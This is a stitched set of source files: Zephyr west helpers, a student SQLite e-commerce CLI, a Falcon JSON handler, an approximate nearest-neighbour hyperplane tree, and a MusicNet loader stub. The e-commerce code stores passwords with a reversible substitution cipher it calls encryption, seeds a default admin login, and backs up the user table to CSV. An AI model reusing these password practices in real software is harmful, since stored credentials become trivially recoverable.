' Hint: use "west list" to list all projects.')
#
# Special files and directories in the west workspace.
#
# These are given variable names for clarity, but they can't be
# changed without propagating the changes into west itself.
#
# Top-level west directory, containing west itself and the manifest.
WEST_DIR = '.west'
# Default manifest repository URL.
MANIFEST_URL_DEFAULT = 'https://github.com/zephyrproject-rtos/zephyr'
#
# Other shared globals.
#
ACTIVE_PROJECTS_HELP = '''\
ACTIVE PROJECTS
---------------
Default output is limited to "active" projects as determined by the:
- "group-filter" manifest file section
- "manifest.group-filter" local configuration option in .west/config
To include inactive projects as well, use "--all" or give an explicit
list of projects (by name or path). See the west documentation for
more details on active projects.
'''
ACTIVE_CLONED_PROJECTS_HELP = f'''\
{ACTIVE_PROJECTS_HELP}
Regardless of the above, output is limited to cloned projects.
'''
#
# Helper class for creating format string keys that are expensive or
# undesirable to compute if not needed.
#
class DelayFormat:
'''Delays formatting an object.'''
def __init__(self, obj):
'''Delay formatting `obj` until a format operation using it.
:param obj: object to format
If callable(obj) returns True, then obj() will be used as the
string to be formatted. Otherwise, str(obj) is used.'''
self.obj = obj
self.as_str = None
def __format__(self, format_spec):
if self.as_str is None:
if callable(self.obj):
self.as_str = self.obj()
assert isinstance(self.as_str, str)
else:
self.as_str = str(self.obj)
return ('{:' + format_spec + '}').format(self.as_str)
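# Minimal usage sketch (the callable below is hypothetical): the lambda is only
# evaluated if the format string actually interpolates the value.
#
#   expensive = DelayFormat(lambda: ' '.join(str(n) for n in range(3)))
#   '{}'.format(expensive)      # invokes the lambda and yields '0 1 2'
#   '{:>10}'.format(expensive)  # the format spec is applied to the string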
#
# Logging helpers
#
class ProjectCommandLogFormatter(logging.Formatter):
def __init__(self):
super().__init__(fmt='%(name)s: %(message)s')
class ProjectCommandLogHandler(logging.Handler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setFormatter(ProjectCommandLogFormatter())
def emit(self, record):
fmt = self.format(record)
lvl = record.levelno
if lvl > logging.CRITICAL:
log.die(fmt)
elif lvl >= logging.ERROR:
log.err(fmt)
elif lvl >= logging.WARNING:
log.wrn(fmt)
elif lvl >= logging.INFO:
log.inf(fmt)
elif lvl >= logging.DEBUG:
log.dbg(fmt)
else:
log.dbg(fmt, level=log.VERBOSE_EXTREME)
``` |
{
"source": "johnvincentmiro/PROG8420-ECOM",
"score": 3
} |
#### File: PROG8420-ECOM/Ecommerceapp/elib.py
```python
import sqlite3
import re
import sys
import time
import datetime
import csv
##tables creator
def tbcreator():
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute('''CREATE TABLE user
("USER_ID" INTEGER NOT NULL,
"LOGIN" TEXT NOT NULL UNIQUE,
"CRYPT_PASS" TEXT NOT NULL,
"ACCESS_COUNT" INTEGER NOT NULL,
"ACS" TEXT NOT NULL,
PRIMARY KEY("USER_ID" AUTOINCREMENT))''')
c.execute('''CREATE TABLE products
("P_ID" INTEGER NOT NULL,
"desc" TEXT NOT NULL UNIQUE,
"price" FLOAT NOT NULL,
"tag" TEXT NOT NULL,
"qty" INTEGER NOT NULL,
PRIMARY KEY("P_ID" AUTOINCREMENT))''')
c.execute('''CREATE TABLE cart
("C_ID" INTEGER NOT NULL,
"LOGIN" TEXT NOT NULL,
"desc" TEXT NOT NULL,
"price" FLOAT NOT NULL,
"tag" TEXT NOT NULL,
"qty" INTEGER NOT NULL,
"status" TEXT NOT NULL,
"date" TEXT NOT NULL,
PRIMARY KEY("C_ID" AUTOINCREMENT))''')
c.execute("INSERT INTO user(LOGIN, CRYPT_PASS, ACCESS_COUNT, ACS) VALUES ('admin', 'tecsg', '0', 'A' )")
conn.commit()
conn.close()
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
except PermissionError:
print("file in use on your system process")
def hme_pg():
print("""
Welcome to the MOB Retail Store
1. Search Products
2. Buy
3. Your Cart
4. Order History
5. Logout
""")
##Encryption and decryption
def encrypt(txt):
x = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
y = 'TIMEODANSFRBCGHJKLPQUVWXYZtimeodansfrbcghjklpquvwxyz9876543210'
table = str.maketrans(x, y)
transl = txt.translate(table)
return transl
def decrypt(txt):
x = 'TIMEODANSFRBCGHJKLPQUVWXYZtimeodansfrbcghjklpquvwxyz9876543210'
y = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
table = str.maketrans(x, y)
transl = txt.translate(table)
return transl
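# Round-trip sketch (values follow from the translation tables above): the seed
# admin row created by tbcreator() stores encrypt('admin') == 'tecsg', and
# decrypt('tecsg') == 'admin' recovers the original text.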
def db_check():
conn = sqlite3.connect("ecom.db", timeout=1)
c = conn.cursor()
try:
c.execute("UPDATE user SET ACCESS_COUNT = ACCESS_COUNT + 1 WHERE LOGIN =?", ['admin'])
conn.commit()
conn.close()
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
def remove(string):
unamestrip = string.replace(" ", "")
return unamestrip
def check_pass(pwd):
pattern = "^[A-Za-z0-9]*$"
while not re.match(pattern, pwd):
pwd = input("Enter account password to add (letters and numbers only): ")
else:
pass
return pwd
def tag_check(tag):
pattern = "^[A-Za-z]*$"
while not re.match(pattern, tag):
tag = input("Enter Tag category (One Word with letters only): ")
else:
pass
return tag
def check_email(uname):
regex = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
while not re.fullmatch(regex, uname):
uname = input("Invalid email please check entry Enter account email to add: ")
else:
pass
return uname
def check_in(twd):
pattern = "^[0-9]*$"
while not re.match(pattern, twd):
twd = input("Enter account number (numbers): ")
else:
pass
return twd
def check_amt(twd):
pattern = "^[0-9.]*$"
while not re.match(pattern, twd):
twd = input("Enter amount up to two decimal places (numbers): ")
else:
pass
return twd
def create_prd(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM products WHERE desc=?", [desc])
if c.fetchone():
            print("Product Description already exists, please try again with a different description \nOr use the Search function to update an existing product \nplease wait...")
time.sleep(2)
else:
price = check_amt(input("Enter product price:-->"))
cat = tag_check(remove(input("Enter product category tag:-->")))
tag = cat.upper()
qty = check_in(input("Enter product qty available:-->"))
c.execute("INSERT INTO products(desc, price, tag, qty) VALUES (?, ?, ?, ?)", [desc, price, tag, qty])
conn.commit()
conn.close()
            print("Product: "+desc+"\nCreation successful \nplease wait...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
print("This product already exists")
sys.exit()
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process")
sys.exit()
def search():
while True:
print("""
Search By Tag or Description
Tags are products categories for example: SHOES/VEG/FRUITS/CLOTHING
1. Tag
2. Description
3. Back
""")
s_choice = input("Please enter desired operation: ")
if s_choice == "1":
wrd = input("Enter tag description: ")
word = wrd.strip()
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE tag LIKE ?", (['%'+word+'%']))
record = c.fetchall()
for row in record:
print(
'Product Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Category:- ', row[2], "\n"
)
conn.close()
else:
print("No more results/End of results")
conn.close()
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
sys.exit()
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process")
time.sleep(3)
sys.exit()
elif s_choice == "2":
wrd = input("Enter Product description: ")
word = wrd.strip()
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE desc LIKE ?", (['%'+word+'%']))
record = c.fetchall()
for row in record:
print(
'Product Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Category:- ', row[2], "\n"
)
conn.close()
else:
print("No more results/End of results \nplease wait...")
conn.close()
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
elif s_choice == "3":
break
else:
print("You have to press 1 or 2 or 3")
def backup():
try:
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
c.execute("SELECT * FROM user")
results = c.fetchall()
headers = [i[0] for i in c.description]
csvfile = csv.writer(open('backups/userbckup.csv', 'w', newline=''),
delimiter=',', lineterminator='\r\n',
quoting=csv.QUOTE_ALL, escapechar='\\')
csvfile.writerow(headers)
csvfile.writerows(results)
c.execute("SELECT * FROM products")
results = c.fetchall()
headers = [i[0] for i in c.description]
csvfile = csv.writer(open('backups/productbckup.csv', 'w', newline=''),
delimiter=',', lineterminator='\r\n',
quoting=csv.QUOTE_ALL, escapechar='\\')
csvfile.writerow(headers)
csvfile.writerows(results)
conn.close()
except sqlite3.DatabaseError as e:
print(e)
print("backup unsuccessful")
except PermissionError as w:
print(w)
print("backup unsuccessful")
print("Check if the file is already open")
def backup_cart():
try:
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
c.execute("SELECT * FROM cart")
results = c.fetchall()
headers = [i[0] for i in c.description]
csvfile = csv.writer(open('backups/cartbckup.csv', 'w', newline=''),
delimiter=',', lineterminator='\r\n',
quoting=csv.QUOTE_ALL, escapechar='\\')
csvfile.writerow(headers)
csvfile.writerows(results)
conn.close()
except sqlite3.DatabaseError as e:
print(e)
print("backup unsuccessful")
except PermissionError as w:
print(w)
print("backup unsuccessful")
print("Check if the file is already open")
def update_prd(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM products WHERE desc=?", [desc])
if c.fetchone():
print("Enter New Details Below: ")
des = input("Enter product description:-->")
prd = des.strip().capitalize()
price = check_amt(input("Enter product price:-->"))
cat = tag_check(remove(input("Enter product category tag:-->")))
tag = cat.upper()
qty = check_in(input("Enter product qty available:-->"))
c.execute("UPDATE products SET desc = ?, price = ?, tag = ?, qty = ? WHERE desc = ?", [prd, price, tag, qty, desc])
conn.commit()
conn.close()
            print("Product: "+desc+"\nUpdate successful \nplease wait...")
time.sleep(2)
else:
print("Product does not exist, verify or search before updating...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def del_prd(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM products WHERE desc=?", [desc])
if c.fetchone():
c.execute("DELETE FROM products WHERE desc = ?", [desc])
conn.commit()
conn.close()
            print("Product: " + desc + "\nDelete successful \nplease wait...")
time.sleep(2)
else:
print("Product: " + desc + "\ndoes not exist, verify or search before deleting...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def ch_cart(desc, uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'O'
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND desc = ? AND status = ?", [uname, desc, st])
if c.fetchone():
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND desc = ? AND status = ?", [uname, desc, st])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
'Total:- ', round((row[1]*row[2]), 2), "\n"
)
                print("This product is already added to your cart.\nTo modify, please view your cart.")
time.sleep(2)
break
else:
buy_prd(desc, uname)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def buy_prd(desc, uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE desc=?", [desc])
if c.fetchone():
dis_item(desc)
qty = check_in(input("Enter qty desired:-->"))
c.execute("SELECT desc, price, tag FROM products WHERE desc=? AND qty < ?", [desc, qty])
if c.fetchone():
                print("Requested quantity exceeds available stock\nplease try again later")
time.sleep(2)
else:
c.execute("SELECT price, tag FROM products WHERE desc=?", [desc])
rec = c.fetchone()
pr = rec[0]
tg = rec[1]
dt = datetime.datetime.now()
st = 'O'
c.execute("UPDATE products SET qty = qty - ? WHERE desc =?", [qty, desc])
c.execute("INSERT INTO cart(LOGIN, desc, price, tag, qty, status, date) VALUES (?, ?, ?, ?, ?, ?, ?)", [uname, desc, pr, tg, qty, st, dt])
conn.commit()
conn.close()
print("Product: " + desc + "\nAdded to Cart \nplease wait...")
time.sleep(2)
else:
print("Product does not exist, verify or search before buying...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def dis_item(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE desc=?", [desc])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def crt_updt(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
so = 'O'
try:
c.execute("SELECT desc, price, qty FROM cart WHERE desc=? AND status = ?", [desc, so])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def dis_cart(uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'O'
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND status = ?", [uname, st])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
'Total:- ', round((row[1]*row[2]), 2), "\n"
)
else:
c.execute("SELECT SUM(price*qty) FROM cart WHERE LOGIN = ? AND status = ?", [uname, st])
result = c.fetchone()
            rslt = str(round(result[0], 2))
print("Cart Grand Total: " + rslt)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def a_orderhis():
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'C'
c.execute("SELECT LOGIN, desc, price, qty, strftime('%Y %m %d',date) FROM cart WHERE status = ? ORDER BY date DESC", [st])
record = c.fetchall()
for row in record:
print(
'\nUser:- ', row[0], "\n"
'Product Description:- ', row[1], "\n"
'Price:- ', row[2], "\n"
'Qty:- ', row[3], "\n"
'Total:- ', round((row[2]*row[3]), 2), "\n"
'Order Date:- ',row[4], "\n"
)
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def u_orderhis(uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'C'
c.execute("SELECT desc, price, qty, strftime('%Y %m %d',date) FROM cart WHERE LOGIN = ? AND status = ? ORDER BY date DESC", [uname, st])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
'Total:- ', round((row[1]*row[2]), 2), "\n"
'Order Date:- ', row[3], "\n"
)
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def cart(uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'O'
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND status = ?", [uname, st])
if c.fetchall():
dis_cart(uname)
checkout(uname)
else:
print("Your cart is empty")
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def checkout(uname):
while True:
print("""
1. Checkout
2. Modify Cart
3. Back
""")
ch = input("Enter Your Choice: ")
st = 'C'
so = 'O'
dt = datetime.datetime.now()
if ch == "1":
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("UPDATE cart SET status = ?, date = ? WHERE LOGIN = ? and status = ?", [st, dt, uname, so])
conn.commit()
conn.close()
print("Checked out successfully \nplease wait...")
time.sleep(2)
break
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
elif ch == "2":
des = input("Enter product description from cart to modify:-->")
prd = des.strip().capitalize()
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM cart WHERE desc=? AND status = ? AND LOGIN = ?", [prd, so, uname])
if c.fetchone():
crt_updt(prd)
qty = check_in(input("Enter New qty:-->"))
if qty == '0':
c.execute("DELETE FROM cart WHERE desc=? AND status = ? AND LOGIN = ?", [prd, so, uname])
conn.commit()
conn.close()
print("Product: " + prd + "\nRemoved successfully \nplease wait...")
time.sleep(2)
cart(uname)
else:
c.execute("UPDATE cart SET qty = ? WHERE desc=? AND status = ? AND LOGIN = ?", [qty, prd, so, uname])
conn.commit()
conn.close()
                        print("Product: " + prd + "\nUpdate successful \nplease wait...")
time.sleep(2)
cart(uname)
else:
                    print("This item is not in your cart, please verify it and try again")
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
elif ch == "3":
break
else:
print("You have to press 1 or 2 or 3")
``` |
{
"source": "JohnVinyard/annotate-api",
"score": 3
} |
#### File: annotate-api/app/customjson.py
```python
import json
import datetime
from falcon.media import BaseHandler
from enum import Enum
class JsonEncoder(json.JSONEncoder):
def __init__(self, convert_to_links):
super().__init__()
self.convert_to_links = convert_to_links
def default(self, o):
try:
return self.convert_to_links.convert_to_link(o)
except KeyError:
pass
if isinstance(o, datetime.datetime):
return o.isoformat() + 'Z'
elif isinstance(o, Enum):
return o.value
else:
return super().default(o)
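# Illustrative behaviour (assuming convert_to_links raises KeyError for plain
# values): a datetime such as datetime.datetime(2020, 1, 1) is rendered as
# "2020-01-01T00:00:00Z", and an Enum member is rendered as its .value.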
class JSONHandler(BaseHandler):
def __init__(self, convert_to_links):
super().__init__()
self.encoder = JsonEncoder(convert_to_links)
def deserialize(self, raw, content_type, content_length):
return json.loads(raw.decode())
def serialize(self, obj, content_type):
return self.encoder.encode(obj).encode()
__all__ = [
    'JSONHandler'
]
```
#### File: annotate-api/examples/cli.py
```python
import argparse
class DefaultArgumentParser(argparse.ArgumentParser):
def __init__(self):
super().__init__(add_help=False)
self.add_argument(
'--password',
required=True,
help='user password')
self.add_argument(
'--annotate-api-endpoint',
required=True,
help='scheme, hostname and optional port for annotation API')
self.add_argument(
'--s3-endpoint',
required=False,
help='scheme, hostname and optional port of s3 endpoint')
self.add_argument(
'--s3-region',
required=False,
default=None)
self.add_argument(
'--aws-access-key-id',
required=False,
default=None)
self.add_argument(
'--aws-secret-access-key',
required=False,
default=None)
class DatasetArgumentParser(DefaultArgumentParser):
def __init__(self):
super().__init__()
self.add_argument(
'--metadata-path',
required=True,
help='path to dataset on disk')
```
#### File: annotate-api/examples/hyperplane_tree.py
```python
from scipy.spatial.distance import cdist
import heapq
import numpy as np
import random
from hashlib import sha1
from itertools import zip_longest
def batch_unit_norm(b, epsilon=1e-8):
"""
Give all vectors unit norm along the last dimension
"""
    return b / (np.linalg.norm(b, axis=-1, keepdims=True) + epsilon)
def unit_vectors(n_examples, n_dims):
"""
Create n_examples of synthetic data on the unit
sphere in n_dims
"""
dense = np.random.normal(0, 1, (n_examples, n_dims))
return batch_unit_norm(dense)
def hyperplanes(n_planes, n_dims):
"""
Return n_planes plane vectors, which describe
hyperplanes in n_dims space that are perpendicular
to lines running from the origin to each point
"""
return unit_vectors(n_planes, n_dims)
def random_projection(plane_vectors, data, pack=True, binarize=True):
"""
Return bit strings for a batch of vectors, with each
bit representing which side of each hyperplane the point
falls on
"""
flattened = data.reshape((len(data), plane_vectors.shape[-1]))
x = np.dot(plane_vectors, flattened.T).T
if not binarize:
return x
output = np.zeros((len(data), len(plane_vectors)), dtype=np.uint8)
output[np.where(x > 0)] = 1
if pack:
output = np.packbits(output, axis=-1).view(np.uint64)
return output
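# Illustrative usage (shapes are assumptions): hash 1000 unit vectors in a
# 64-dimensional space against 64 random hyperplanes.
#
#   planes = hyperplanes(64, 64)
#   points = unit_vectors(1000, 64)
#   codes = random_projection(planes, points)  # packed bits, shape (1000, 1), dtype uint64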
def traversal(roots, pop_from=0):
build_queue = list(roots)
while build_queue:
next_node = build_queue.pop(pop_from)
yield build_queue, next_node
class HyperPlaneNode(object):
def __init__(self, shape, data=None, plane=None):
super(HyperPlaneNode, self).__init__()
self.dimensions = shape
# choose one plane, at random, for this node
if plane is None:
self.plane = hyperplanes(1, shape)
else:
self.plane = plane
self.data = \
data if data is not None else np.zeros((0,), dtype=np.uint64)
self.left = None
self.right = None
def __hash__(self):
return hash(sha1(self.plane).hexdigest())
def traverse(self):
for queue, node in traversal([self], pop_from=0):
yield node
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
def __eq__(self, other):
st = self.traverse()
try:
ot = other.traverse()
except AttributeError:
return False
for a, b in zip_longest(st, ot):
if np.any(a.data != b.data):
return False
if np.any(a.plane != b.plane):
return False
return True
def __len__(self):
return len(self.data)
def __repr__(self):
return f'Node(hash={hash(self)})'
def __str__(self):
return self.__repr__()
@property
def is_leaf(self):
return self.left is None and self.right is None
@property
def children(self):
return self.left, self.right
def distance(self, query):
dist = random_projection(
self.plane, query, pack=False, binarize=False).reshape(-1)
return dist
def route(self, data, indices=None):
if indices is None:
indices = self.data
data = data[indices]
dist = self.distance(data)
left_indices = indices[dist > 0]
right_indices = indices[dist <= 0]
return left_indices, right_indices
def create_children(self, data):
left_indices, right_indices = self.route(data)
self.left = HyperPlaneNode(self.dimensions, left_indices)
self.right = HyperPlaneNode(self.dimensions, right_indices)
class MultiHyperPlaneTree(object):
def __init__(self, data, smallest_node, n_trees=10):
super(MultiHyperPlaneTree, self).__init__()
self.data = data
indices = np.arange(0, len(data), dtype=np.uint64)
self.smallest_node = smallest_node
self.roots = \
[HyperPlaneNode(self.dimensions, indices) for _ in range(n_trees)]
build_queue = list(self.roots)
while build_queue:
node = build_queue.pop()
if len(node) <= smallest_node:
continue
else:
node.create_children(self.data)
build_queue.extend(node.children)
@property
def dimensions(self):
return self.data.shape[1]
def check(self):
output = []
for queue, node in traversal(list(self.roots), pop_from=0):
output.append(str(node))
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return output
def __setstate__(self, state):
def build_node(_, plane, data):
return HyperPlaneNode(state['shape'], data, plane)
roots = [build_node(*data) for data in state['roots']]
self.roots = roots
self.data = state['data']
self.smallest_node = state['smallest_node']
graph = state['graph']
for queue, next_node in traversal(roots, pop_from=0):
left, right = graph[hash(next_node)]
if left:
left = build_node(*left)
next_node.left = left
queue.append(left)
if right:
right = build_node(*right)
next_node.right = right
queue.append(right)
def __getstate__(self):
def node_state(node):
return hash(node), node.plane, node.data
graph = dict()
for queue, next_node in traversal(list(self.roots), pop_from=0):
item = []
left = next_node.left
right = next_node.right
if left:
queue.append(left)
item.append(node_state(left))
else:
item.append(None)
if right:
queue.append(right)
item.append(node_state(right))
else:
item.append(None)
graph[hash(next_node)] = item
roots = [node_state(r) for r in self.roots]
return {
'shape': self.roots[0].dimensions,
'roots': roots,
'graph': graph,
'smallest_node': self.smallest_node,
'n_trees': len(roots),
'data': self.data
}
def __eq__(self, other):
return all(s == r for (s, r) in zip(self.roots, other.roots))
def __len__(self):
return len(self.data)
def append(self, chunk):
# compute the new set of indices that need to be added to the tree
new_indices = np.arange(0, len(chunk), dtype=np.uint64) + len(self.data)
# ensure that the chunk of vectors are added to the available vector
# data
self.data = np.concatenate([self.data, chunk])
# initialize the search queue with all root nodes
search_queue = list([(r, new_indices) for r in self.roots])
while search_queue:
# add the indices to the node's data
node, indices = search_queue.pop()
node.data = np.concatenate([node.data, indices])
if len(node) <= self.smallest_node:
# this will be a leaf node. There's no need to further route
# the data or add further child nodes (for now)
continue
if node.is_leaf:
# we'll be creating new child nodes. At this point, we need
# to route *all* of the data currently owned by this node
node.create_children(self.data)
else:
# this node already has children, so it's only necessary to
# route new indices
left_indices, right_indices = node.route(self.data, indices)
search_queue.append((node.left, left_indices))
search_queue.append((node.right, right_indices))
def search_with_priority_queue(
self,
query,
n_results,
threshold,
return_distances=False,
return_vectors=False):
query = query.reshape(1, self.dimensions)
indices = set()
# this is kinda arbitrary.
# How do I pick this intelligently?
to_consider = n_results * 100
# put the root nodes in the queue
# KLUDGE: Assign arbitrary values to each root node, taking on values
# larger than the greatest possible cosine distance to ensure that
# each root node is processed first
# KLUDGE: Add a random number in the second position to ensure that
# hyperplane nodes are never compared in the event of identical
# distances
heap = [
(-((i + 1) * 10), random.random(), root)
for i, root in enumerate(self.roots)
]
# traverse the tree, finding candidate indices
while heap and (len(indices) < to_consider):
current_distance, _, current_node = heapq.heappop(heap)
if current_node.is_leaf:
indices.update(current_node.data)
continue
dist = current_node.distance(query)
abs_dist = np.abs(dist)
below_threshold = abs_dist < threshold
# KLUDGE: Add a random number in the second position to ensure that
# hyperplane nodes are never compared in the event of identical
# distances
if dist > 0 or below_threshold:
heapq.heappush(
heap, (-abs_dist, random.random(), current_node.left))
if dist <= 0 or below_threshold:
heapq.heappush(
heap, (-abs_dist, random.random(), current_node.right))
# perform a brute-force distance search over a subset of the data
indices = np.array(list(indices), dtype=np.uint64)
data = self.data[indices]
dist = cdist(query, data, metric='cosine').squeeze()
partitioned_indices = np.argpartition(dist, n_results)[:n_results]
sorted_indices = np.argsort(dist[partitioned_indices])
srt_indices = partitioned_indices[sorted_indices]
final_indices = indices[srt_indices]
if return_vectors:
return final_indices, self.data[final_indices]
elif return_distances:
return final_indices, dist[sorted_indices]
else:
return final_indices
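# Minimal end-to-end sketch (parameter values are assumptions): build a small
# forest over random unit vectors and query it for approximate nearest
# neighbours.
#
#   data = unit_vectors(10000, 8)
#   tree = MultiHyperPlaneTree(data, smallest_node=64, n_trees=10)
#   nearest = tree.search_with_priority_queue(
#       data[0], n_results=16, threshold=0.001)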
```
#### File: annotate-api/examples/musicnet_dataset.py
```python
from http import client
from cli import DatasetArgumentParser
from client import Client
import argparse
import os
from csv import DictReader
from zounds.util import midi_to_note, midi_instrument
from s3client import ObjectStorageClient
import soundfile
from log import module_logger
from mp3encoder import encode_mp3
logger = module_logger(__file__)
def slugify(s):
return s.lower().replace('(', '').replace(')', '').replace(' ', '-')
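# For example, slugify('Piano Quintet in A major (Trout)') yields
# 'piano-quintet-in-a-major-trout'.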
def get_metadata(path):
metadata = dict()
metadata_file = os.path.join(path, 'musicnet_metadata.csv')
with open(metadata_file, 'r') as f:
